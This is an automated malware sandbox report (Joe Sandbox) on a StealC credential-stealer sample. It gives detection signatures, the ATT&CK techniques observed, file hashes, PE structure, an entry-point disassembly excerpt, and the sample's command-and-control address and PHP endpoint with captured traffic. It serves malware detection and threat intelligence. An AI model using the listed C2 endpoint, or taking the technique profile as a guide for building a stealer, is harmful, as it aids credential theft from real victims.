                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: stealcy11.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: stealcy11.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.stealcy11.exe.8e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API
                  1
                  Create Account
                  11
                  Process Injection
                  1
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping1
                  System Time Discovery
                  Remote ServicesData from Local System12
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  LSASS Memory31
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection
                  Security Account Manager1
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive11
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS12
                  Process Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets1
                  Account Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  System Owner/User Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  stealcy11.exe61%ReversingLabsWin32.Trojan.StealC
                  stealcy11.exe57%VirustotalBrowse
                  stealcy11.exe100%AviraTR/Crypt.ZPACK.Gen
                  stealcy11.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https:/135.181.65.216/ee45b7c5e4cb75cb.phptrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://135.181.65.216/Wstealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://upx.sf.netAmcache.hve.6.drfalse
                          high
                          https://135.181.65.216/stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://135.181.65.216stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              https://135.181.65.216/zstealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                135.181.65.216
                                unknownGermany
                                24940HETZNER-ASDEtrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1579700
                                Start date and time:2024-12-23 07:57:51 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 25s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:stealcy11.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@2/5@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 17
                                • Number of non-executed functions: 42
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.12.23.50, 20.190.147.2, 20.109.210.53
                                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                01:59:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                s-part-0035.t-0009.t-msedge.netskIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                • 13.107.246.63
                                fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                mPQW1NB2Px.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 13.107.246.63
                                uw7vXaPNPF.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                HOEcO4nqCT.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                D7M4c24p9T.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                fW6RLQpTIt.exeGet hashmaliciousCryptbotBrowse
                                • 13.107.246.63
                                gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                • 13.107.246.63
                                clip64.dllGet hashmaliciousAmadeyBrowse
                                • 13.107.246.63
                                https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                HETZNER-ASDEgVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                • 94.130.188.57
                                trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                • 94.130.188.57
                                9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                • 94.130.188.57
                                AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                • 94.130.188.57
                                Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                • 213.239.239.164
                                GoldenContinent.exeGet hashmaliciousVidarBrowse
                                • 94.130.188.57
                                https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                • 135.181.58.223
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                • 94.130.188.57
                                https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                • 136.243.5.53
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                • 94.130.188.57
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9522942431940097
                                Encrypted:false
                                SSDEEP:192:JnrcLw0BU/Hn2nbjvYZrRtozuiFUZ24IO8CnV:Zr4LBU/HMbjeazuiFUY4IO8wV
                                MD5:FC278DED03D45B0F3166CDF831807D81
                                SHA1:73989FEC61CB40D947690AF1CB7DEA21704F1326
                                SHA-256:E0E206B4B216A008490DB87454F6BDAEAA92D55FCB518372A555B373FA36C6CD
                                SHA-512:1975668AB83A326DDE504195F13BDE7B70DBC4DA17F8F546B7E725D2139E00D26B3075EF24C53EF8E596C1EFA7284D2141C02ACBEC1482E40298D30DC08D6DC4
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.0.7.4.5.4.3.7.5.2.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.0.7.4.6.4.2.1.8.9.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.b.3.b.a.b.9.-.b.6.e.f.-.4.3.6.b.-.b.0.d.e.-.5.8.0.f.a.b.6.d.5.4.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.4.6.f.f.7.d.-.c.3.7.1.-.4.6.8.b.-.9.2.2.3.-.4.f.a.7.b.9.9.a.5.4.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.e.a.l.c.y.1.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.6.8.-.0.0.0.1.-.0.0.1.4.-.c.8.9.5.-.0.0.1.a.0.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.9.f.2.1.d.6.6.5.1.9.0.e.a.9.e.3.4.b.8.d.a.d.0.c.d.e.a.d.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.0.5.1.9.5.b.1.a.7.0.f.0.7.8.c.9.1.1.6.9.9.8.d.7.4.8.6.e.6.7.2.d.9.0.e.9.3.2.1.8.!.s.t.e.a.l.c.y.1.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 23 06:59:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):120282
                                Entropy (8bit):1.6038957628368737
                                Encrypted:false
                                SSDEEP:384:klwQmieeEPYKkrZdoJbLz1QGtIfFYA7b/cTtyiu8VD:4wleEPkdodLhMfvoToE
                                MD5:4E91700F1BCB5AC3150E27E2870114B6
                                SHA1:8D1A390953EF4BD6253CE983881A410E90D121CA
                                SHA-256:C73E3AC38CBD587E8ECF027755D01F58358F9AE95375A5DCC2CB23D13427774C
                                SHA-512:737A4730416ED8B700A5F3E44151440A48B186D09111EAA9F548930C6DE0BAFEA569A17C28803142ABF77E6A438B81AC7F5909D09FB5D4861E744B9F98B46A3D
                                Malicious:false
                                Reputation:low
                                Preview:MDMP..a..... .......:.ig.........................................B..........T.......8...........T...........p6..j.......................................................................................................eJ......\ ......GenuineIntel............T.......h...".ig.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8342
                                Entropy (8bit):3.692819113543501
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJgw6PEKqKz6YcDOSUpGdgmfgYpr+89bgAsf2Am:R6lXJP6XqKz6YZSUpGdgmfgqgTfo
                                MD5:6C49D1032EBDFE2751AC4111511D1C9F
                                SHA1:8FA64CB4BCE619B641F8A4A71B4582C6D0819140
                                SHA-256:5D5441F2510D7C0CE75BCB2302707FA264E9309D30F1A11DFE67AFE27ACDF106
                                SHA-512:328DC89BDC4CD1C381470DA6B3A1172673160EA0D51E5EDF4305C1D1E87EE365F82D05F56EA1B13F6263D13DADC692B599A141FAE0851F066F23317279EAE5FB
                                Malicious:false
                                Reputation:low
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.8.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4578
                                Entropy (8bit):4.438496723589363
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsnxJg77aI9roWpW8VYqp/Ym8M4J2LeFlXj+q88sT29sSZWd:uIjfnDI71B7V7kJ2i/OgdZWd
                                MD5:A13386F06A5BA0721149014849899F92
                                SHA1:D619030400BB147AA4A58D0A86AFEFF9794CFEE7
                                SHA-256:75AE618624295B2C6F131BE64BAF6B022B442FC4C86AC923CE5BC937BA713E83
                                SHA-512:1E0D2EC83497F3865AAB5D3AD3AD44E5BDFFCD8DF63FFF1EFF0D08F8B01A3FEB61253F1FBA578FCFB671589D0FC8B2C1C711EC7E0AB288627B563D31F123B361
                                Malicious:false
                                Reputation:low
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643561" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.393732706427489
                                Encrypted:false
                                SSDEEP:6144:Dl4fiJoH0ncNXiUjt10qYG/gaocYGBoaUMMhA2NX4WABlBuNAsOBSqa:B4vFYMYQUMM6VFYSsU
                                MD5:108C36402BFEF432D901AECE821EC476
                                SHA1:C74DBFAE6366A8D8A0A2785B827AA4D4647EE1F3
                                SHA-256:A2E5C1E213D3272840718B1530353E5AC90D8EEDD24DDBD65D8DDBA3B3C7A44B
                                SHA-512:684983DCADD2BDAB8C5F942FE62FD38D6AE90336D5B4E292F01F1580FB635E669C81C87F2F73750FB568EC959AE2AF0DE61B217E3712E52033CB1E070E6A8478
                                Malicious:false
                                Reputation:low
                                Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'.U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.573123644643754
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:stealcy11.exe
                                File size:245'760 bytes
                                MD5:004431fc72fc1228abf10e298efa0271
                                SHA1:05195b1a70f078c9116998d7486e672d90e93218
                                SHA256:082796fccb8ffb566a99ba188cae572eac30f1bf6e11a7bf4e5ebe757bc66c88
                                SHA512:8e1c87b177cd3cd687760f002fea6851ae34b2543df434ed1db4146a33a684f5a386e4e6d9d76bd14e064dd29fe6cc1cb0407cac10abf0c9cd4513eefcac8335
                                SSDEEP:3072:sCFW6ZRlcV3K+gqCClq/oPk1U894z1tJS7pmLUMOmjoRWwhSeUReHeP3KqX+n:j1J7+go0U8evIFmLu6kKeot+
                                TLSH:6D341925DF41403FEE12867CD6F963D1B22669A46322D8D733CC25198DF40E32D7E6AA
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d.....s.|.....F.i.....r.^...m.[.g...m.K.b.......g...d.........w.w.....E.e...Richd...........PE..L...!.gg...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x421bd0
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6767E521 [Sun Dec 22 10:08:33 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:d071ac95ea1d6b0ed6ec53017449901f
                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 34h
                                push ebx
                                push esi
                                push edi
                                call 00007F2A20F0A257h
                                call 00007F2A20F2DC72h
                                xor ebx, ebx
                                cmp byte ptr [0042D014h], bl
                                je 00007F2A20F2949Fh
                                lea ecx, dword ptr [ecx+00h]
                                inc ebx
                                cmp byte ptr [ebx+0042D014h], 00000000h
                                jne 00007F2A20F29488h
                                lea eax, dword ptr [ebx+01h]
                                call 00007F2A20F0A0D3h
                                mov dword ptr [ebp-10h], eax
                                test eax, eax
                                je 00007F2A20F2949Eh
                                push 0042D014h
                                push eax
                                call dword ptr [00639134h]
                                call dword ptr [006390E4h]
                                movzx eax, ax
                                add eax, FFFFFBE7h
                                cmp eax, 2Ah
                                jnbe 00007F2A20F294A8h
                                movzx eax, byte ptr [eax+00421E54h]
                                jmp dword ptr [00421E4Ch+eax*4]
                                push 00000000h
                                call dword ptr [0063901Ch]
                                call 00007F2A20F2A2C2h
                                mov ecx, dword ptr [00638D40h]
                                call 00007F2A20F2B5F7h
                                test eax, eax
                                jne 00007F2A20F294ADh
                                call 00007F2A20F2A21Eh
                                mov ecx, dword ptr [00638E1Ch]
                                call 00007F2A20F2B5E3h
                                test eax, eax
                                jne 00007F2A20F29499h
                                push eax
                                call dword ptr [0063901Ch]
                                mov edi, dword ptr [00638D40h]
                                push edi
                                call dword ptr [00638FACh]
                                lea esi, dword ptr [ebx+eax]
                                lea eax, dword ptr [esi+01h]
                                call 00007F2A20F0A050h
                                mov ebx, eax
                                mov dword ptr [ebp-34h], ebx
                                test ebx, ebx
                                je 00007F2A20F294ADh
                                mov eax, dword ptr [ebp-10h]
                                test eax, eax
                                je 00007F2A20F294A6h
                                test edi, edi
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x366440x3c.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24a0000x3c7c.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x104.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x2951a0x29600df2d115e7c4d351090d551d0efaa4319False0.40288071185800606data6.375878850752631IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x2b0000xbba40xbc000842159b30b0a5e7723012d6bde04732False0.5963056848404256data6.667148204014933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x370000x212bec0xc00f7d82f3649bd5266c892c8c1b457e92bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .reloc0x24a0000x5d000x5e0062b76e5280e9e60573614263fb763b9cFalse0.5253075132978723data5.2508129632036535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                DLLImport
                                msvcrt.dllrand, strncpy, ??_V@YAXPAX@Z, strtok, memchr, strtok_s, ??_U@YAPAXI@Z, strcpy_s, vsprintf_s, memmove, strlen, malloc, free, memcmp, ??2@YAPAXI@Z, memset, memcpy, __CxxFrameHandler3, _except_handler3
                                KERNEL32.dllInitializeCriticalSectionAndSpinCount, GetStringTypeW, MultiByteToWideChar, LCMapStringW, IsValidCodePage, GetOEMCP, GetACP, lstrlenA, HeapAlloc, GetProcessHeap, VirtualProtect, CreateProcessA, lstrcatA, VirtualQueryEx, OpenProcess, ReadProcessMemory, WriteFile, GetCPInfo, WideCharToMultiByte, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, TerminateProcess, GetCurrentProcess, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, GetProcAddress, GetModuleHandleW, ExitProcess, Sleep, GetStdHandle, GetModuleFileNameW, GetLastError, LoadLibraryW, TlsGetValue, TlsSetValue, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, RaiseException
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-12-23T07:58:48.693601+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949712135.181.65.216443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Dec 23, 2024 07:58:43.838241100 CET49712443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:43.838290930 CET44349712135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:43.838567019 CET49712443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:43.854825020 CET49712443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:43.854850054 CET44349712135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:48.693377018 CET44349712135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:48.693600893 CET49712443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:48.693717957 CET49712443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:48.693751097 CET44349712135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:48.694417000 CET49723443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:48.694458008 CET44349723135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:48.694540024 CET49723443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:48.694829941 CET49723443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:48.694843054 CET44349723135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:53.397090912 CET44349723135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:53.397186995 CET49723443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:53.397301912 CET49723443192.168.2.9135.181.65.216
                                Dec 23, 2024 07:58:53.397345066 CET44349723135.181.65.216192.168.2.9
                                Dec 23, 2024 07:58:53.398099899 CET49734443192.168.2.9135.181.65.216
